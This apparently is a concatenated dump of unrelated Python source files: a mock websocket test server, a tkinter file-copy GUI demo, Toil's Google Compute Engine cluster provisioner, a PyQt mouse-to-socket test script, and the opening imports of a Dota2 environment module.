if len(args) == 1 and not kwargs:
ep, = args
else:
ep = ws_endpoint(*args, **kwargs)
if ep.owner is not None:
raise RuntimeError('an endpoint cannot be added twice')
with self._route_lock:
self._app.routes.append(
WebSocketRoute(ep.rule_string, ep.endpoint, name=ep.__name__)
)
ep.owner = self
return ep
def remove_ws_endpoint(self, endpoint: MockWSEndpoint):
"""
Remove a websocket endpoint previously added to the server
Args:
endpoint: the endpoint to remove
"""
self._raise_from_pending()
if endpoint.owner is not self:
raise RuntimeError('endpoint is not added to the server')
with self._route_lock:
for i, route in enumerate(self._app.router.routes):
if isinstance(route, WebSocketRoute) and route.app == endpoint.endpoint:
break
else:
raise RuntimeError('endpoint is not found in the server')
self._app.router.routes.pop(i)
endpoint.owner = None
@overload
def patch_ws_endpoint(self, endpoint: MockWSEndpoint) -> ContextManager[MockWSEndpoint]:
...
@overload
def patch_ws_endpoint(self, rule_string: str, side_effect: WS_SIDE_EFFECT) -> ContextManager[MockWSEndpoint]:
...
@contextmanager # type:ignore[misc]
def patch_ws_endpoint(self, *args, **kwargs):
"""
A context manager to add and then remove a ws endpoint
Args:
*args: forwarded to self.add_ws_endpoint
**kwargs: forwarded to self.add_ws_endpoint
Returns:
The temporarily added endpoint
"""
ep = self.add_ws_endpoint(*args, **kwargs)
try:
yield ep
finally:
self.remove_ws_endpoint(ep)
def local_url(self, schema: Optional[str] = 'http') -> str:
"""
Get the url to access this server from the local machine
Args:
schema: the optional schema of the url, defaults to http
"""
if schema is None:
return f'localhost:{self.port}'
return f'{schema}://localhost:{self.port}'
def container_url(self, schema='http') -> str:
"""
Get the url to access this server from a docker container running in the local machine
Args:
schema: the optional schema of the url, defaults to http
"""
if schema is None:
return f'{docker_host_name}:{self.port}'
return f'{schema}://{docker_host_name}:{self.port}'
def start(self, retry_spec: Optional[RetrySpec] = None) -> WebServer:
if self._serve_thread.is_alive():
raise RuntimeError('thread cannot be started twice')
with mute_uvicorn_log():
self._serve_thread.start()
with self.patch_http_endpoint('GET', '/__yellowbox/ping', side_effect=PlainTextResponse('')):
retry_spec = retry_spec or RetrySpec(interval=0.1, timeout=5)
retry_spec.retry(
lambda: get(self.local_url() + '/__yellowbox/ping').raise_for_status(),
(ConnectionError, HTTPError)
)
return super().start()
def stop(self):
with mute_uvicorn_log():
self._server.should_exit = True
self._serve_thread.join()
super().stop()
self._raise_from_pending()
def is_alive(self) -> bool:
self._raise_from_pending()
return self._serve_thread.is_alive()
def _raise_from_pending(self):
# if there is a pending exception, this will raise it
if self._pending_exception:
pending = self._pending_exception
self._pending_exception = None
raise HandlerError() from pending
|
GUI_copy_files_limit.py
|
'''
May 2017
@author: Burkhard A. Meier
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import messagebox as msg
from tkinter import Spinbox
from time import sleep
import Ch04_Code.ToolTip as tt
from threading import Thread
from queue import Queue
import Ch06_Code.Queues as bq
from tkinter import filedialog as fd
from os import path, makedirs
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
#=====================================================
class OOP():
def __init__(self): # Initializer method
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Create a Queue
self.gui_queue = Queue()
self.create_widgets()
self.defaultFileEntries()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fDir)
if len(fDir) > self.entryLen:
# self.fileEntry.config(width=len(fDir) + 3)
self.fileEntry.config(width=35) # limit width to adjust GUI
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, netDir)
if len(netDir) > self.entryLen:
# self.netwEntry.config(width=len(netDir) + 3)
self.netwEntry.config(width=35) # limit width to adjust GUI
# Create Queue instance
def use_queues(self, loops=5):
# Now using a class member Queue
while True:
print(self.gui_queue.get())
def method_in_a_thread(self, num_of_loops=10):
for idx in range(num_of_loops):
sleep(1)
self.scrol.insert(tk.INSERT, str(idx) + '\n')
# Running methods in Threads
def create_thread(self, num=1):
self.run_thread = Thread(target=self.method_in_a_thread, args=[num])
self.run_thread.setDaemon(True)
self.run_thread.start()
# start queue in its own thread
write_thread = Thread(target=self.use_queues, args=[num], daemon=True)
write_thread.start()
# Button callback
def click_me(self):
self.action.configure(text='Hello ' + self.name.get())
print(self)
# self.create_thread() # now called from imported module
bq.write_to_scrol(self)
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scrol.insert(tk.INSERT, value + '\n')
# GUI Callback
def checkCallback(self, *ignored_args):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton Callback
def radCall(self):
radSel = self.radVar.get()
if radSel == 0: self.mighty2.configure(text='Blue')
elif radSel == 1: self.mighty2.configure(text='Gold')
elif radSel == 2: self.mighty2.configure(text='Red')
# update progressbar in callback loop
def run_progressbar(self):
self.progress_bar["maximum"] = 100
for i in range(101):
sleep(0.05)
self.progress_bar["value"] = i # increment progressbar
self.progress_bar.update() # have to call update() in loop
self.progress_bar["value"] = 0 # reset/clear progressbar
def start_progressbar(self):
self.progress_bar.start()
def stop_progressbar(self):
self.progress_bar.stop()
def progressbar_stop_after(self, wait_ms=1000):
self.win.after(wait_ms, self.progress_bar.stop)
def usingGlobal(self):
global GLOBAL_CONST
GLOBAL_CONST = 777
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
#####################################################################################
def create_widgets(self):
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='Tab 1') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Tab 2') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# LabelFrame using tab1 as the parent
mighty = ttk.LabelFrame(tab1, text=' Mighty Python ')
mighty.grid(column=0, row=0, padx=8, pady=4)
# Modify adding a Label using mighty as the parent instead of win
a_label = ttk.Label(mighty, text="Enter a name:")
a_label.grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
self.name = tk.StringVar()
self.name_entered = ttk.Entry(mighty, width=24, textvariable=self.name)
self.name_entered.grid(column=0, row=1, sticky='W')
self.name_entered.delete(0, tk.END)
self.name_entered.insert(0, '< default name >')
# Adding a Button
self.action = ttk.Button(mighty, text="Click Me!", command=self.click_me)
self.action.grid(column=2, row=1)
ttk.Label(mighty, text="Choose a number:").grid(column=1, row=0)
number = tk.StringVar()
self.number_chosen = ttk.Combobox(mighty, width=14, textvariable=number, state='readonly')
self.number_chosen['values'] = (1, 2, 4, 42, 100)
self.number_chosen.grid(column=1, row=1)
self.number_chosen.current(0)
# Adding a Spinbox widget
self.spin = Spinbox(mighty, values=(1, 2, 4, 42, 100), width=5, bd=9, command=self._spin) # using range
self.spin.grid(column=0, row=2, sticky='W') # align left
# Using a scrolled Text control
scrol_w = 40; scrol_h = 10 # increase sizes
self.scrol = scrolledtext.ScrolledText(mighty, width=scrol_w, height=scrol_h, wrap=tk.WORD)
self.scrol.grid(column=0, row=3, sticky='WE', columnspan=3)
for child in mighty.winfo_children(): # add spacing to align widgets within tabs
child.grid_configure(padx=4, pady=2)
#=====================================================================================
# Tab Control 2 ----------------------------------------------------------------------
self.mighty2 = ttk.LabelFrame(tab2, text=' The Snake ')
self.mighty2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
chVarDis = tk.IntVar()
check1 = tk.Checkbutton(self.mighty2, text="Disabled", variable=chVarDis, state='disabled')
check1.select()
check1.grid(column=0, row=0, sticky=tk.W)
chVarUn = tk.IntVar()
check2 = tk.Checkbutton(self.mighty2, text="UnChecked", variable=chVarUn)
check2.deselect()
check2.grid(column=1, row=0, sticky=tk.W)
chVarEn = tk.IntVar()
check3 = tk.Checkbutton(self.mighty2, text="Enabled", variable=chVarEn)
check3.deselect()
check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# First, we change our Radiobutton global variables into a list
colors = ["Blue", "Gold", "Red"]
# create three Radiobuttons using one variable
self.radVar = tk.IntVar()
# Next we are selecting a non-existing index value for radVar
self.radVar.set(99)
# Now we are creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = tk.Radiobutton(self.mighty2, text=colors[col], variable=self.radVar,
value=col, command=self.radCall)
curRad.grid(column=col, row=1, sticky=tk.W)
# And now adding tooltips
tt.create_ToolTip(curRad, 'This is a Radiobutton control')
# Add a Progressbar to Tab 2
self.progress_bar = ttk.Progressbar(tab2, orient='horizontal', length=342, mode='determinate')
self.progress_bar.grid(column=0, row=3, pady=2)
# Create a container to hold buttons
buttons_frame = ttk.LabelFrame(self.mighty2, text=' ProgressBar ')
buttons_frame.grid(column=0, row=2, sticky='W', columnspan=2)
# Add Buttons for Progressbar commands
ttk.Button(buttons_frame, text=" Run Progressbar ", command=self.run_progressbar).grid(column=0, row=0, sticky='W')
ttk.Button(buttons_frame, text=" Start Progressbar ", command=self.start_progressbar).grid(column=0, row=1, sticky='W')
ttk.Button(buttons_frame, text=" Stop immediately ", command=self.stop_progressbar).grid(column=1, row=0, sticky='W')
ttk.Button(buttons_frame, text=" Stop after second ", command=self.progressbar_stop_after).grid(column=1, row=1, sticky='W')
for child in buttons_frame.winfo_children():
child.grid_configure(padx=2, pady=2)
for child in self.mighty2.winfo_children():
child.grid_configure(padx=8, pady=2)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrol_w - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
msg.showinfo('Copy File to Network', 'Succes: File copied.')
except FileNotFoundError as err:
msg.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
msg.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menu_bar = Menu(self.win)
self.win.config(menu=menu_bar)
# Add menu items
file_menu = Menu(menu_bar, tearoff=0)
file_menu.add_command(label="New")
file_menu.add_separator()
file_menu.add_command(label="Exit", command=self._quit)
menu_bar.add_cascade(label="File", menu=file_menu)
# Display a Message Box
def _msgBox():
msg.showinfo('Python Message Info Box', 'A Python GUI created using tkinter:\nThe year is 2017.')
# Add another Menu to the Menu Bar and an item
help_menu = Menu(menu_bar, tearoff=0)
help_menu.add_command(label="About", command=_msgBox) # display messagebox when clicked
menu_bar.add_cascade(label="Help", menu=help_menu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# It is not necessary to create a tk.StringVar()
# strData = tk.StringVar()
strData = self.spin.get()
# call function
self.usingGlobal()
# self.name_entered.focus()
# Set focus to Tab 2
tabControl.select(1)
# Add Tooltips -----------------------------------------------------
# Add a Tooltip to the Spinbox
tt.create_ToolTip(self.spin, 'This is a Spinbox control')
# Add Tooltips to more widgets
tt.create_ToolTip(self.name_entered, 'This is an Entry control')
tt.create_ToolTip(self.action, 'This is a Button control')
tt.create_ToolTip(self.scrol, 'This is a ScrolledText control')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
gceProvisioner.py
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import threading
import time
import uuid
import requests
from libcloud.compute.drivers.gce import GCEFailedNode
from libcloud.compute.providers import get_driver
from libcloud.compute.types import Provider
from toil.jobStores.googleJobStore import GoogleJobStore
from toil.provisioners import NoSuchClusterException
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.node import Node
logger = logging.getLogger(__name__)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
class GCEProvisioner(AbstractProvisioner):
"""
Implements a Google Compute Engine Provisioner using libcloud.
"""
NODE_BOTO_PATH = "/root/.boto" # boto file path on instances
SOURCE_IMAGE = (b'projects/flatcar-cloud/global/images/family/flatcar-stable')
def __init__(self, clusterName, clusterType, zone, nodeStorage, nodeStorageOverrides, sseKey):
self.cloud = 'gce'
self._sseKey = sseKey
# Call base class constructor, which will call createClusterSettings()
# or readClusterSettings()
super(GCEProvisioner, self).__init__(clusterName, clusterType, zone, nodeStorage, nodeStorageOverrides)
def supportedClusterTypes(self):
return {'mesos'}
def createClusterSettings(self):
# All we need to do is read the Google credentials we need to provision
# things
self._readCredentials()
def readClusterSettings(self):
"""
Read the cluster settings from the instance, which should be the leader.
See https://cloud.google.com/compute/docs/storing-retrieving-metadata for details about
reading the metadata.
"""
metadata_server = "http://metadata/computeMetadata/v1/instance/"
metadata_flavor = {'Metadata-Flavor': 'Google'}
zone = requests.get(metadata_server + 'zone', headers = metadata_flavor).text
self._zone = zone.split('/')[-1]
project_metadata_server = "http://metadata/computeMetadata/v1/project/"
self._projectId = requests.get(project_metadata_server + 'project-id', headers = metadata_flavor).text
# From a GCE instance, these values can be blank. Only the projectId is needed
self._googleJson = ''
self._clientEmail = ''
self._tags = requests.get(metadata_server + 'description', headers = metadata_flavor).text
tags = json.loads(self._tags)
self.clusterName = tags['clusterName']
self._gceDriver = self._getDriver()
self._instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
leader = self.getLeader()
self._leaderPrivateIP = leader.privateIP
# The location of the Google credentials file on instances.
self._credentialsPath = GoogleJobStore.nodeServiceAccountJson
self._keyName = 'core' # key name leader users to communicate with works
self._botoPath = self.NODE_BOTO_PATH # boto credentials (used if reading an AWS bucket)
# Let the base provisioner work out how to deploy duly authorized
# workers for this leader.
self._setLeaderWorkerAuthentication()
def _readCredentials(self):
"""
Get the credentials from the file specified by GOOGLE_APPLICATION_CREDENTIALS.
"""
self._googleJson = os.getenv('GOOGLE_APPLICATION_CREDENTIALS')
if not self._googleJson:
raise RuntimeError('GOOGLE_APPLICATION_CREDENTIALS not set.')
try:
with open(self._googleJson) as jsonFile:
self.googleConnectionParams = json.loads(jsonFile.read())
except:
raise RuntimeError('GCEProvisioner: Could not parse the Google service account json file %s'
% self._googleJson)
self._projectId = self.googleConnectionParams['project_id']
self._clientEmail = self.googleConnectionParams['client_email']
self._credentialsPath = self._googleJson
self._clearLeaderWorkerAuthentication() # TODO: Why are we doing this?
self._gceDriver = self._getDriver()
def launchCluster(self, leaderNodeType, leaderStorage, owner, **kwargs):
"""
In addition to the parameters inherited from the abstractProvisioner,
the Google launchCluster takes the following parameters:
keyName: The key used to communicate with instances
botoPath: Boto credentials for reading an AWS jobStore (optional).
vpcSubnet: A subnet (optional).
"""
if 'keyName' not in kwargs:
raise RuntimeError("A keyPairName is required for the GCE provisioner.")
self._keyName = kwargs['keyName']
if 'botoPath' in kwargs:
self._botoPath = kwargs['botoPath']
self._vpcSubnet = kwargs['vpcSubnet'] if 'vpcSubnet' in kwargs else None
# Throws an error if cluster exists
self._instanceGroup = self._gceDriver.ex_create_instancegroup(self.clusterName, self._zone)
logger.debug('Launching leader')
# GCE doesn't have a dictionary tags field. The tags field is just a string list.
# Therefore, dumping tags into the description.
tags = {'Owner': self._keyName, 'clusterName': self.clusterName}
if 'userTags' in kwargs:
tags.update(kwargs['userTags'])
self._tags = json.dumps(tags)
metadata = {'items': [{'key': 'user-data', 'value': self._getCloudConfigUserData('leader')}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : leaderStorage }
disk.update({'boot': True,
'autoDelete': True })
name= 'l' + str(uuid.uuid4())
leader = self._gceDriver.create_node(
name,
leaderNodeType,
imageType,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_subnetwork=self._vpcSubnet,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible=False
)
self._instanceGroup.add_instances([leader])
self._leaderPrivateIP = leader.private_ips[0] # needed if adding workers
#self.subnetID = leader.subnet_id #TODO: get subnetID
# Wait for the appliance to start and inject credentials.
leaderNode = Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=self._tags)
leaderNode.waitForNode('toil_leader', keyName=self._keyName)
leaderNode.copySshKeys(self._keyName)
leaderNode.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_leader')
if self._botoPath:
leaderNode.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_leader')
# Download credentials
self._setLeaderWorkerAuthentication(leaderNode)
logger.debug('Launched leader')
def getNodeShape(self, instance_type: str, preemptable=False):
# TODO: read this value only once
sizes = self._gceDriver.list_sizes(location=self._zone)
sizes = [x for x in sizes if x.name == instance_type]
assert len(sizes) == 1
instanceType = sizes[0]
disk = 0 #instanceType.disks * instanceType.disk_capacity * 2 ** 30
if disk == 0:
# This is an EBS-backed instance. We will use the root
# volume, so add the amount of EBS storage requested forhe root volume
disk = self._nodeStorageOverrides.get(instance_type, self._nodeStorage) * 2 ** 30
# Ram is in M.
#Underestimate memory by 100M to prevent autoscaler from disagreeing with
#mesos about whether a job can run on a particular node type
memory = (instanceType.ram/1000 - 0.1) * 2** 30
return Shape(wallTime=60 * 60,
memory=memory,
cores=instanceType.extra['guestCpus'],
disk=disk,
preemptable=preemptable)
@staticmethod
def retryPredicate(e):
""" Not used by GCE """
return False
def destroyCluster(self):
"""
Try a few times to terminate all of the instances in the group.
"""
logger.debug("Destroying cluster %s" % self.clusterName)
instancesToTerminate = self._getNodesInCluster()
attempts = 0
while instancesToTerminate and attempts < 3:
self._terminateInstances(instances=instancesToTerminate)
instancesToTerminate = self._getNodesInCluster()
attempts += 1
# remove group
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instanceGroup.destroy()
def terminateNodes(self, nodes):
nodeNames = [n.name for n in nodes]
instances = self._getNodesInCluster()
instancesToKill = [i for i in instances if i.name in nodeNames]
self._terminateInstances(instancesToKill)
def addNodes(self, nodeTypes: Set[str], numNodes, preemptable, spotBid=None):
assert self._leaderPrivateIP
# We don't support any balancing here so just pick one of the
# equivalent node types
node_type = next(iter(nodeTypes))
# If keys are rsynced, then the mesos-slave needs to be started after the keys have been
# transferred. The waitForKey.sh script loops on the new VM until it finds the keyPath file, then it starts the
# mesos-slave. If there are multiple keys to be transferred, then the last one to be transferred must be
# set to keyPath.
keyPath = None
botoExists = False
if self._botoPath is not None and os.path.exists(self._botoPath):
keyPath = self.NODE_BOTO_PATH
botoExists = True
elif self._sseKey:
keyPath = self._sseKey
if not preemptable:
logger.debug('Launching %s non-preemptable nodes', numNodes)
else:
logger.debug('Launching %s preemptable nodes', numNodes)
#kwargs["subnet_id"] = self.subnetID if self.subnetID else self._getClusterInstance(self.instanceMetaData).subnet_id
userData = self._getCloudConfigUserData('worker', keyPath, preemptable)
metadata = {'items': [{'key': 'user-data', 'value': userData}]}
imageType = 'flatcar-stable'
sa_scopes = [{'scopes': ['compute', 'storage-full']}]
disk = {}
disk['initializeParams'] = {
'sourceImage': self.SOURCE_IMAGE,
'diskSizeGb' : self._nodeStorageOverrides.get(node_type, self._nodeStorage) }
disk.update({'boot': True,
'autoDelete': True })
# TODO:
# - bug in gce.py for ex_create_multiple_nodes (erroneously, doesn't allow image and disk to specified)
# - ex_create_multiple_nodes is limited to 1000 nodes
# - use a different function
# - or write a loop over the rest of this function, with 1K nodes max on each iteration
retries = 0
workersCreated = 0
# Try a few times to create the requested number of workers
while numNodes-workersCreated > 0 and retries < 3:
instancesLaunched = self.ex_create_multiple_nodes(
'', node_type, imageType, numNodes-workersCreated,
location=self._zone,
ex_service_accounts=sa_scopes,
ex_metadata=metadata,
ex_disks_gce_struct = [disk],
description=self._tags,
ex_preemptible = preemptable
)
failedWorkers = []
for instance in instancesLaunched:
if isinstance(instance, GCEFailedNode):
logger.error("Worker failed to launch with code %s. Error message: %s"
% (instance.code, instance.error))
continue
node = Node(publicIP=instance.public_ips[0], privateIP=instance.private_ips[0],
name=instance.name, launchTime=instance.created_at, nodeType=instance.size,
preemptable=False, tags=self._tags) #FIXME: what should tags be set to?
try:
self._injectWorkerFiles(node, botoExists)
logger.debug("Created worker %s" % node.publicIP)
self._instanceGroup.add_instances([instance])
workersCreated += 1
except Exception as e:
logger.error("Failed to configure worker %s. Error message: %s" % (node.name, e))
failedWorkers.append(instance)
if failedWorkers:
logger.error("Terminating %d failed workers" % len(failedWorkers))
self._terminateInstances(failedWorkers)
retries += 1
logger.debug('Launched %d new instance(s)', numNodes)
if numNodes != workersCreated:
logger.error("Failed to launch %d worker(s)", numNodes-workersCreated)
return workersCreated
def getProvisionedWorkers(self, instance_type: Optional[str] = None, preemptable: Optional[bool] = None):
assert self._leaderPrivateIP
entireCluster = self._getNodesInCluster(instance_type=instance_type)
logger.debug('All nodes in cluster: %s', entireCluster)
workerInstances = []
for instance in entireCluster:
if preemptable is not None:
scheduling = instance.extra.get('scheduling')
# If this field is not found in the extra meta-data, assume the node is not preemptable.
if scheduling and scheduling.get('preemptible', False) != preemptable:
continue
isWorker = True
for ip in instance.private_ips:
if ip == self._leaderPrivateIP:
isWorker = False
break # don't include the leader
if isWorker and instance.state == 'running':
workerInstances.append(instance)
logger.debug('All workers found in cluster: %s', workerInstances)
return [Node(publicIP=i.public_ips[0], privateIP=i.private_ips[0],
name=i.name, launchTime=i.created_at, nodeType=i.size,
preemptable=i.extra.get('scheduling', {}).get('preemptible', False), tags=None)
for i in workerInstances]
def getLeader(self):
instances = self._getNodesInCluster()
instances.sort(key=lambda x: x.created_at)
try:
leader = instances[0] # assume leader was launched first
except IndexError:
raise NoSuchClusterException(self.clusterName)
return Node(publicIP=leader.public_ips[0], privateIP=leader.private_ips[0],
name=leader.name, launchTime=leader.created_at, nodeType=leader.size,
preemptable=False, tags=None)
def _injectWorkerFiles(self, node, botoExists):
"""
Set up the credentials on the worker.
"""
node.waitForNode('toil_worker', keyName=self._keyName)
node.copySshKeys(self._keyName)
node.injectFile(self._credentialsPath, GoogleJobStore.nodeServiceAccountJson, 'toil_worker')
if self._sseKey:
node.injectFile(self._sseKey, self._sseKey, 'toil_worker')
if botoExists:
node.injectFile(self._botoPath, self.NODE_BOTO_PATH, 'toil_worker')
def _getNodesInCluster(self, instance_type: Optional[str] = None):
instanceGroup = self._gceDriver.ex_get_instancegroup(self.clusterName, zone=self._zone)
instances = instanceGroup.list_instances()
if instance_type:
instances = [instance for instance in instances if instance.size == instance_type]
return instances
def _getDriver(self):
""" Connect to GCE """
driverCls = get_driver(Provider.GCE)
return driverCls(self._clientEmail,
self._googleJson,
project=self._projectId,
datacenter=self._zone)
def _terminateInstances(self, instances):
def worker(driver, instance):
logger.debug('Terminating instance: %s', instance.name)
driver.destroy_node(instance)
threads = []
for instance in instances:
t = threading.Thread(target=worker, args=(self._gceDriver,instance))
threads.append(t)
t.start()
logger.debug('... Waiting for instance(s) to shut down...')
for t in threads:
t.join()
# MONKEY PATCH - This function was copied form libcloud to fix a bug.
DEFAULT_TASK_COMPLETION_TIMEOUT = 180
def ex_create_multiple_nodes(
self, base_name, size, image, number, location=None,
ex_network='default', ex_subnetwork=None, ex_tags=None,
ex_metadata=None, ignore_errors=True, use_existing_disk=True,
poll_interval=2, external_ip='ephemeral',
ex_disk_type='pd-standard', ex_disk_auto_delete=True,
ex_service_accounts=None, timeout=DEFAULT_TASK_COMPLETION_TIMEOUT,
description=None, ex_can_ip_forward=None, ex_disks_gce_struct=None,
ex_nic_gce_struct=None, ex_on_host_maintenance=None,
ex_automatic_restart=None, ex_image_family=None,
ex_preemptible=None):
"""
Monkey patch to gce.py in libcloud to allow disk and images to be specified.
Also changed name to a uuid below.
The prefix 'wp' identifies preemptable nodes and 'wn' non-preemptable nodes.
"""
# if image and ex_disks_gce_struct:
# raise ValueError("Cannot specify both 'image' and "
# "'ex_disks_gce_struct'.")
driver = self._getDriver()
if image and ex_image_family:
raise ValueError("Cannot specify both 'image' and "
"'ex_image_family'")
location = location or driver.zone
if not hasattr(location, 'name'):
location = driver.ex_get_zone(location)
if not hasattr(size, 'name'):
size = driver.ex_get_size(size, location)
if not hasattr(ex_network, 'name'):
ex_network = driver.ex_get_network(ex_network)
if ex_subnetwork and not hasattr(ex_subnetwork, 'name'):
ex_subnetwork = \
driver.ex_get_subnetwork(ex_subnetwork,
region=driver._get_region_from_zone(
location))
if ex_image_family:
image = driver.ex_get_image_from_family(ex_image_family)
if image and not hasattr(image, 'name'):
image = driver.ex_get_image(image)
if not hasattr(ex_disk_type, 'name'):
ex_disk_type = driver.ex_get_disktype(ex_disk_type, zone=location)
node_attrs = {'size': size,
'image': image,
'location': location,
'network': ex_network,
'subnetwork': ex_subnetwork,
'tags': ex_tags,
'metadata': ex_metadata,
'ignore_errors': ignore_errors,
'use_existing_disk': use_existing_disk,
'external_ip': external_ip,
'ex_disk_type': ex_disk_type,
'ex_disk_auto_delete': ex_disk_auto_delete,
'ex_service_accounts': ex_service_accounts,
'description': description,
'ex_can_ip_forward': ex_can_ip_forward,
'ex_disks_gce_struct': ex_disks_gce_struct,
'ex_nic_gce_struct': ex_nic_gce_struct,
'ex_on_host_maintenance': ex_on_host_maintenance,
'ex_automatic_restart': ex_automatic_restart,
'ex_preemptible': ex_preemptible}
# List for holding the status information for disk/node creation.
status_list = []
for i in range(number):
name = 'wp' if ex_preemptible else 'wn'
name += str(uuid.uuid4()) #'%s-%03d' % (base_name, i)
status = {'name': name, 'node_response': None, 'node': None}
status_list.append(status)
start_time = time.time()
complete = False
while not complete:
if (time.time() - start_time >= timeout):
raise Exception("Timeout (%s sec) while waiting for multiple "
"instances")
complete = True
time.sleep(poll_interval)
for status in status_list:
# Create the node or check status if already in progress.
if not status['node']:
if not status['node_response']:
driver._multi_create_node(status, node_attrs)
else:
driver._multi_check_node(status, node_attrs)
# If any of the nodes have not been created (or failed) we are
# not done yet.
if not status['node']:
complete = False
# Return list of nodes
node_list = []
for status in status_list:
node_list.append(status['node'])
return node_list
|
test.py
|
from simple import *
from PyQt5.QtWidgets import QApplication, QMainWindow
from multiprocessing import Process
import socket
import threading
lock = threading.RLock()
HOST = "192.168.2.5"
PORT = 65432
content = 'hello'
class ReadFromConnThread(threading.Thread):
def __init__(self, conn):
super().__init__()
self.conn = conn
def run(self):
try:
while True:
contents = self.conn.recv(1024)
print(f"\n({HOST}:{PORT}): {contents.decode('utf-8')}\n", end="")
except Exception:
pass
def socket_start():
global content
print(str(id(content))+"--1")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
read_thread = ReadFromConnThread(s)
read_thread.daemon = True
read_thread.start()
while True:
print(str(id(content))+"--2")
for i in range(1000000000):
a=0
while content == "wuhu":
s.sendall(content.encode("utf-8"))
lock.acquire()
content = 'pass'
lock.release()
s.close()
flag_lr = False # left is False right is True
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
# 使用ui文件导入定义界面类
self.ui = Ui_MainWindow()
# 初始化界面
self.ui.setupUi(self)
def mouseMoveEvent(self, event):
global flag_lr
global content
print(str(id(content))+ "--3")
s = event.windowPos()
self.setMouseTracking(True)
self.ui.label.setText('X:' + str(s.x()))
self.ui.label_2.setText('Y:' + str(s.y()))
if s.x() > 300 and flag_lr == False:
range(1000000000)
print("发射")
lock.acquire()
content = 'wuhu'
print(str(id(content))+"--4")
lock.release()
flag_lr = True
elif s.x() >= 300:
lock.acquire()
content = 'wuhu'
lock.release()
pass
elif s.x() <= 100:
lock.acquire()
content = 'pass'
lock.release()
flag_lr = False
def window_start():
app = QApplication([])
mainw = MainWindow()
mainw.show()
app.exec_()
if __name__ == '__main__':
#global content
t2 = Process(target=window_start)
t1 = Process(target=socket_start)
t2.start()
t1.start()
|
Dota2Env.py
|
import sys
from threading import Thread
from time import sleep
import numpy as np
